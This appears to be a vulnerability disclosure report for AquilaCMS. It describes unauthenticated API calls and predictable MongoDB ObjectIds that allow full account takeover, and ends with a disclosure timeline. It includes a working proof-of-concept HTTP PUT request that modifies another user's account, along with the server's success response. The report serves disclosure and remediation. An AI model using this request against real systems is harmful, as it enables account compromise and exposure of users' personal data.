AquilaCMS Vulnerability
Description
Unauthenticated API function calls allows any user to change or view another users first name, last name, password, and address information. As well, leaked activateAccountToken and resetPassToken can be viewed which are used during the password reset function. Total Account compromise is possible through these API calls.
Proof of Concept
The attacker can guess the correct MongoDB_object ID as it is proven to not be securely random and majority of the token is leaked during registration. Once an attacker has generated a valid object_id, they can use the linked GitHub repo to generate other users' object_id. After using the linked GitHub repo, you can use the unauthenticated API calls the view, modify, and compromise the account associated with the _id found. Example of updating another users information;
Variables: {IP}, {ID}
PUT /api/v2/user HTTP/1.1
Host: {IP}:3010
Content-Length: 245
Accept: application/json, text/plain, */*
lang: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://{IP}:3010
Referer: http://{IP}:3010/account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{"delivery_address":1,"billing_address":0,"isActiveAccount":false,"_id":"{ID}","civility":1,"lastname":"whatever20","firstname":"whatever","email":"admin2@admin2.aaa","preferredLanguage":"en","fullname":"whatever whatever10"}
Response:
HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Set-Cookie: cookie_notice=false; Path=/; Expires=Mon, 01 Nov 2021 22:16:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1037
Date: Sun, 01 Aug 2021 22:16:11 GMT
Connection: close
{"code":"USER_UPDATE_SUCCESS",
[ ... ]
Location
References
Disclosure
August 1st, 2021 - Initial Contact
August 10th, 2021 - Maintainer Confirmed Vulnerability
October 19th, 2021 - Follow-up Remediation - No Response